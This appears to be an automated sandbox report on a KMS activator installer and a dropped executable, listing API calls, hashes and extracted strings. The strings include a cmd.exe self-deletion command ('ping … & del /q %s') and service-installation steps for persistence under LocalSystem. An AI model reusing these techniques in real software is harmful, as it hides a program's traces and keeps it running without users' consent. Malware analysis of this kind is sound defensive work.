    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
    • String ID: CopyFiles "%s"->"%s"
    • API String ID: 2577523808-3778932970
    • Opcode ID: d91c2609d9d3a37918362883fdd1f32f0ce6f5ab44a5e9b9e725bd033ea1f936
    • Instruction ID: df1308414e874344385ccb0db70743e34215db7086e03601d978367423407a79
    • Opcode Fuzzy Hash: d91c2609d9d3a37918362883fdd1f32f0ce6f5ab44a5e9b9e725bd033ea1f936
    • Instruction Fuzzy Hash: 83113D71904318AACB10FFA999459DEBBF8EF44358F10443BF505FB2A2D6788941CB69
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrcatwsprintf
    • String ID: %02x%c$...
    • API String ID: 3065427908-1057055748
    • Opcode ID: 8330ec017dcf6daaa5d87f9e6d12c7f7e60b5fb70ce942f64005b789dc36ba0a
    • Instruction ID: 6998a8d77c804a990b3433b75bf199d1650f41c430b5dadfc9386a88cdae5be5
    • Opcode Fuzzy Hash: 8330ec017dcf6daaa5d87f9e6d12c7f7e60b5fb70ce942f64005b789dc36ba0a
    • Instruction Fuzzy Hash: 5C01B572950619AFD711CF68DD45A9FBBE9EF44701F20813AF484F3280D6749E548BE8
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • WritePrivateProfileStringA.KERNEL32(?,?,?,00000000), ref: 0040272F
    Strings
    • C:\Windows\SysNative\drivers\DvLayout.exe, xrefs: 00402715
    • <RM>, xrefs: 004026B4
    • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 0040271A
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: PrivateProfileStringWritelstrcpyn
    • String ID: <RM>$C:\Windows\SysNative\drivers\DvLayout.exe$WriteINIStr: wrote [%s] %s=%s in %s
    • API String ID: 247603264-2423860124
    • Opcode ID: 7f30c35f5c633a43eb66eb5f240fd7aa6aefab5825936b9c379b1d297ddd1144
    • Instruction ID: 17fbd0df00fd6fcb045c31dc677474ef42d25d5906b3dbd4b5cc0818ab61737d
    • Opcode Fuzzy Hash: 7f30c35f5c633a43eb66eb5f240fd7aa6aefab5825936b9c379b1d297ddd1144
    • Instruction Fuzzy Hash: B8014B31D00624AACB107FA68D86ADF3A64AB08758B24413FF5153B2E3D6BC0A419BDD
    APIs
    • OleInitialize.OLE32(00000000), ref: 00404DF2
      • Part of subcall function 00403C55: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403C67
    • OleUninitialize.OLE32(00000404,00000000), ref: 00404E40
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
    • String ID: Section: "%s"$Skipping section: "%s"
    • API String ID: 2266616436-4211696005
    • Opcode ID: 9f8dacae5462a6c76399edffbbead4483db15c11ba895e786ad9a2b1b14c0b8f
    • Instruction ID: a1697c68c77ba4781e91379a15daded32d39c1c12dad084193f7f42822588db5
    • Opcode Fuzzy Hash: 9f8dacae5462a6c76399edffbbead4483db15c11ba895e786ad9a2b1b14c0b8f
    • Instruction Fuzzy Hash: 8AF0D177104200AAE6107B64EC06B1A73A5EBC1711F24403FFE95721E2DF7808818AAD
    APIs
    • GetDC.USER32(?), ref: 004020DC
    • GetDeviceCaps.GDI32(00000000), ref: 004020E3
    • MulDiv.KERNEL32(00000000,00000000), ref: 004020F3
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • CreateFontIndirectA.GDI32(0040A0C4), ref: 00402146
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CapsCreateDeviceFontIndirectVersionlstrcat
    • String ID:
    • API String ID: 1124445332-0
    • Opcode ID: 2144f8e1522c99ba9602bfd674ab3bc82ecac8f0158a9007b54edcabe13f8dc0
    • Instruction ID: 640259e299a3f16f87b007cf3a8cc9a13f68f15686798f0dd8441b0453c9db7e
    • Opcode Fuzzy Hash: 2144f8e1522c99ba9602bfd674ab3bc82ecac8f0158a9007b54edcabe13f8dc0
    • Instruction Fuzzy Hash: 79F04F725853489EF701AFB0AE1AB893F64A725305F10847AF281B71E3C97E40149B2E
    APIs
    • IsWindowVisible.USER32(?), ref: 004046A7
    • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404715
      • Part of subcall function 00403C55: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403C67
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Window$CallMessageProcSendVisible
    • String ID:
    • API String ID: 3748168415-3916222277
    • Opcode ID: 609411c60a85332449a719750bce59a4915ce97d36c76212318bc84f1f531435
    • Instruction ID: 9605e2b7d7455f37462fd22875193d20b491428cb3cfe519dcb6b817c987f101
    • Opcode Fuzzy Hash: 609411c60a85332449a719750bce59a4915ce97d36c76212318bc84f1f531435
    • Instruction Fuzzy Hash: 2B11BFB1101208FBEF119F91DD81E9B3628AF86314F00803BFB047A1A2C7798C919FA9
    APIs
    • ShellExecuteA.SHELL32(?,00000000,?,00000000,00475000,?), ref: 004021DE
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402206
    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 004021EF
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ExecuteShelllstrlenwvsprintf
    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
    • API String ID: 2380004146-2180253247
    • Opcode ID: 0166cebb8d322ba320c64392f3385074b70222ed256a77a233417cfb13c162eb
    • Instruction ID: 4de43b39cb7189c535d92a21d1e38ea8c65eaee599c17ba73f054ba9bc91490a
    • Opcode Fuzzy Hash: 0166cebb8d322ba320c64392f3385074b70222ed256a77a233417cfb13c162eb
    • Instruction Fuzzy Hash: 0801F5766001047ADB007BF9DC46EEE3BA8DB4578CB10803BF511FA0E2E57C8951A7AD
    APIs
    • lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
    • wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00405D7D: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,00405F2E,00000000), ref: 00405D93
    Strings
    • RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"), xrefs: 00405EFF, 00405F04
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseHandlelstrlenwvsprintf
    • String ID: RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\")
    • API String ID: 3509786178-605988816
    • Opcode ID: 7e4a409281f33c932ecf39ae807571fbd8485c9876b92d50a7589ceb09592647
    • Instruction ID: 9387209c9b180116a0db68cc4ae5316e14ed9d72600609c89a58cc0d7888ddef
    • Opcode Fuzzy Hash: 7e4a409281f33c932ecf39ae807571fbd8485c9876b92d50a7589ceb09592647
    • Instruction Fuzzy Hash: 7ED0A774408346AEDB0057D0CD2DF567B64BF883C5F80447DF148460B0DB74604C8B19
    APIs
    • lstrlenA.KERNEL32(0040644E,?,00000000,00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060A6
    • lstrcmpiA.KERNEL32(00000000,0040644E), ref: 004060BE
    • CharNextA.USER32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060CF
    • lstrlenA.KERNEL32(00000000,?,00000000,0040644E,00000000,[Rename],?,00000000,000000F1,?), ref: 004060D8
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: lstrlen$CharNextlstrcmpi
    • String ID:
    • API String ID: 190613189-0
    • Opcode ID: e21e6bfb6fc7a963e8afd99923d37c6b6527800589d0fa15ebc8de9f734da840
    • Instruction ID: 19299f1ab5e3fb249da8c31f47c0dd26908f8824a629a5ffd1e92f46b51ecce3
    • Opcode Fuzzy Hash: e21e6bfb6fc7a963e8afd99923d37c6b6527800589d0fa15ebc8de9f734da840
    • Instruction Fuzzy Hash: 45F0F631100558FFC701DFA4CD00D9EBBA8EF05360B1280BAE841F7311DA30DE019BA9
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00641B11
    • GetLastError.KERNEL32 ref: 00641B1B
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000003), ref: 00641B3B
    • GetLastError.KERNEL32 ref: 00641B47
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$FileManagerModuleNameOpen
    • String ID: %s is installed.$.\LocalSystem$CreateService failed w/err 0x%08lx$GetModuleFileName failed w/err 0x%08lx$OpenSCManager failed w/err 0x%08lx$RService$ c
    • API String ID: 1348810199-2665779175
    • Opcode ID: 440aa0284982132a4decb8b5f4a440378999109d8d308e57d340257d897b3506
    • Instruction ID: 4fa6c9a0948fc050a51c343de4de4d391a7aa6a519376ce0b364b880480d8e8f
    • Opcode Fuzzy Hash: 440aa0284982132a4decb8b5f4a440378999109d8d308e57d340257d897b3506
    • Instruction Fuzzy Hash: B531E471780308ABD7106F64DD87FBD366BDF46B55F110118FB05AF2C1EAA0998487A5
    APIs
      • Part of subcall function 006BD893: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BD89F
      • Part of subcall function 006BD893: __CxxThrowException@8.LIBVCRUNTIME ref: 006BD8AD
      • Part of subcall function 00633A90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633AD1
      • Part of subcall function 00633B90: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00633BD1
      • Part of subcall function 00633B90: _wcsrchr.LIBVCRUNTIME ref: 00633BE0
    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,00000400,?,?,94A94BDB,?,?,?), ref: 00631DBA
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,?,?), ref: 00631F0F
    • StartServiceCtrlDispatcherW.ADVAPI32(?,?,?), ref: 00631F4D
    • CloseHandle.KERNEL32(?,?,?), ref: 00631F65
    • Sleep.KERNEL32(000001F4,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe,?,?), ref: 00632056
    • CopyFileW.KERNELBASE(00000000,00000000,00000000,?), ref: 006320C0
    • Sleep.KERNELBASE(000001F4), ref: 006320CB
    • GetLastError.KERNEL32 ref: 006320F7
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063210F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: File$ModuleName$Exception@8SleepThrow$CloseCopyCreateCtrlDispatcherErrorEventHandleLastServiceStart_wcsrchrstd::invalid_argument::invalid_argument
    • String ID: C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe$\xo$string too long
    • API String ID: 1238941938-3394848091
    • Opcode ID: 6d2a4ec511a9300ef295c4bd16aee91795d8cb807623b37bfa0b2fb39ea2ccdf
    • Instruction ID: 6024e36c242810f52276b80ebf63105e649e26a40098d70b461f76e8f37bc043
    • Opcode Fuzzy Hash: 6d2a4ec511a9300ef295c4bd16aee91795d8cb807623b37bfa0b2fb39ea2ccdf
    • Instruction Fuzzy Hash: 0BA1EF71D002199BDB14EFA4CC99BEEBBB7FF04300F10415CE505AB291DB75AA89CBA5
    APIs
      • Part of subcall function 00635020: GetModuleFileNameA.KERNEL32(00000000,?,00000080,?,00633F35,?,?,00000080), ref: 0063503F
    • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00633F67
    • ExitProcess.KERNEL32 ref: 00633F6F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ExecuteExitFileModuleNameProcessShell
    • String ID: /c ping -n 3 127.1 >nul & del /q %s$cmd.exe$open
    • API String ID: 1425974386-2322895437
    • Opcode ID: 624039afe26d4ace10207f3ad3e090d697e191eaf63d971410a8f1b212766eb3
    • Instruction ID: 5704c568be49ee4bf2b39fe3d672b8eb77b5aa6ace0d3d5bba2f7b8f786767b8
    • Opcode Fuzzy Hash: 624039afe26d4ace10207f3ad3e090d697e191eaf63d971410a8f1b212766eb3
    • Instruction Fuzzy Hash: 6AF054B194430CBBEF50EBA0DD46F99737DAB04700F4044A1B748E61C2EA70A7098BA5
    APIs
    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,?,006320F2), ref: 00641DA7
    • OpenServiceW.ADVAPI32(00000000,006F6DD8,00000034), ref: 00641DBC
    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00641DCD
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00641DDA
    • CloseServiceHandle.ADVAPI32(00000000), ref: 00641DE1
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Service$CloseHandleOpen$ManagerStart
    • String ID:
    • API String ID: 1485051382-0
    • Opcode ID: a36b39139fe6f8b005c32ec4682aac023e478788bae0a9316e59793934c7ad84
    • Instruction ID: cf87dc3c04af91ce2a591177222497de51bb7bca438d6a64b19203fa147f34dd
    • Opcode Fuzzy Hash: a36b39139fe6f8b005c32ec4682aac023e478788bae0a9316e59793934c7ad84
    • Instruction Fuzzy Hash: 32E09232681B2077D3322314AC49F9E56275FC2F52F160110F604BF2D48EA49A0645A0
    APIs
    • _strlen.LIBCMT ref: 0069BB88
    • _strlen.LIBCMT ref: 0069BBA0
    • _strlen.LIBCMT ref: 0069BBC0
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BC61
    • _strncpy.LIBCMT ref: 0069BC93
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BCC8
    • _strncpy.LIBCMT ref: 0069BD50
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BD86
    • ___from_strstr_to_strchr.LIBCMT ref: 0069BDCC
    • getsockname.WS2_32(?,?,00000080), ref: 0069BF22
    • WSAGetLastError.WS2_32(?,00000080,?,?), ref: 0069BF41
    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0069C143
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069C852
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$_strlen$ErrorLast_strncpy$CheckStackVars@8getsockname
    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$@'$A$Failure sending EPRT command: %s$Failure sending PORT command: %s$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$getsockname() failed: %s$getsockname() failed: %s$socket failure: %s$socket failure: %s
    • API String ID: 673287134-299674065
    • Opcode ID: ff3ae7551b010389b2d8ef11a155cd4f0ef335434455790e711ed6ad32fbd54d
    • Instruction ID: 869ef2881d2122fb01b6b6838411d148772eeb659d099ab2e55817d444944535
    • Opcode Fuzzy Hash: ff3ae7551b010389b2d8ef11a155cd4f0ef335434455790e711ed6ad32fbd54d
    • Instruction Fuzzy Hash: 0B82A2B1E003289BDF64DB54DC41BEEB77AAF4A304F0441D9E509A7682DB349E81CF96
    APIs
    • GetLastError.KERNEL32(?,00000080,?), ref: 006B045E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,00664304,?,?,00000080), ref: 006A593A
      • Part of subcall function 006A5920: _strncpy.LIBCMT ref: 006A598E
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A06
      • Part of subcall function 006A5920: _strrchr.LIBCMT ref: 006A5A2E
      • Part of subcall function 006A5920: GetLastError.KERNEL32(?,?,?,?,?,?,?,00664304), ref: 006A5A68
      • Part of subcall function 006A5920: SetLastError.KERNEL32(00000080,?,?,?,?,?,?,?,00664304), ref: 006A5A80
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 006B04AE
    • GetLastError.KERNEL32(?,00000080), ref: 006B04D2
    • CloseHandle.KERNEL32(000000FF), ref: 006B0961
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B09A7
    Strings
